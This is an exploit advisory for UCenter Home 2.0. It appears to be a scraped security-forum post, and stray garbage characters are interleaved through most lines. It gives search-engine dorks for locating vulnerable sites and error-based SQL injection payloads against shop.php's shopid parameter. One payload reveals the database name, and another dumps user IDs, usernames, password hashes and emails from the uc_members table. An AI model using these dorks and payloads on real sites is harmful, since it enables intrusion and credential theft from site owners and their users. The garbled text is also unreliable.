0 { P% i9 n" G" D" ~! e; y
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
" b" T3 O6 B+ ]0 Q+ ?. @2 p
* i$ | D+ ~/ E/ y6 \; P
6 R. [! A6 K7 C) J6 |' s0 A" X
1 g2 g8 Q" q y: a! x5 H2 {0 @*/ Author : KnocKout 3 x7 a( h' P" b
+ h, w( F" ?. c/ E8 O3 }*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
# B8 g/ z( Y2 q6 p6 @. J
9 y0 t; n; y/ X/ K" b*/ Contact: knockoutr@msn.com
+ q/ P" G0 b8 C; I+ G
& I4 i) }8 A. R1 p' D/ N*/ Cyber-Warrior.org/CWKnocKout
6 `$ q F4 G7 g
) h* k$ w M, \$ {6 Q__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
1 Q) `' z% H( l& h. ]. k; ]- {5 `5 j$ D
Script : UCenter Home
7 n5 j- w+ {+ S2 s& m
E4 ]# n1 Z+ K% k* K% HVersion : 2.0
* n0 a, ]. B+ J5 t" E9 y5 r1 v1 i2 G3 k) M7 v
Script HomePage : http://u.discuz.net/ # x9 y* q3 v4 c: [% k a" T
. J3 G9 n/ U9 Z* E* g2 V8 d
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 6 ]) e9 V' f: i) _' J
- K6 M, x# u3 j, ^, V
Dork : Powered by UCenter inurl:shop.php?ac=view
y0 ^& L X+ S; {% O
# {' V5 ~! @% xDork 2 : inurl:shop.php?ac=view&shopid= 0 g1 t0 u; n' w, T: Z- ? j
7 p/ V4 N5 `) f& F: q
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
W$ X4 Y- e7 @2 U/ _
# I' R5 c! B4 I: z3 QVuln file : Shop.php
$ k1 ^- M* c, ?9 M* _- i0 a% d0 X9 b
( _) b2 @( G$ b" V0 ~8 A6 c2 Ovalue's : (?)ac=view&shopid= 0 q- w& Z( y+ @- e4 }( @6 [* b
q. y) H3 @4 i: G5 ~5 ^Vulnerable Style : SQL Injection (MySQL Error Based)
: g7 c. y. f2 n+ _" h! o2 l, u' R( D2 b0 G
Need Metarials : Hex Conversion $ r$ b; p: x. ~- R8 [5 p+ m
+ ?6 x3 ~3 \9 l__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
) [/ P6 D \0 H. |/ o7 H7 s5 L8 @, c: d$ [/ `0 T+ b
Your Need victim Database name.
. k. V, l+ e( s) F: b/ V% T3 H- S+ d& [# | |
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 6 }- J0 H# O K$ ^
/ l8 z. E" f* P9 e- Y..
( \! V, {4 `+ u: o* g8 @: w
9 \ `4 }- L, T, @& Y+ w JDB : Okey. % l9 r% [; F: z9 m# z
; j! p+ u5 K: G' Tyour edit DB `[TARGET DB NAME]`
8 u1 v$ |9 i) W9 Y
D& `" W+ U9 U8 lExample : 'hiwir1_ucenter'
* l2 f0 _$ f& e! Z
+ p# D' \% M! {' W( i! b& C9 a' E FEdit : Okey.
! K/ J- U0 e1 N N1 S e0 M" `5 [8 N7 d, j' l3 B0 T& M7 w) _
Your use Hex conversion. And edit Your SQL Injection Exploit..
+ ^6 C3 t8 ^; C+ C0 m5 L( j% w" x9 X/ \) g
8 i" y. q0 N. o
$ w; z0 D2 Z+ C, F: M* OExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
! c6 t/ F, u* j' k0 _- z9 F |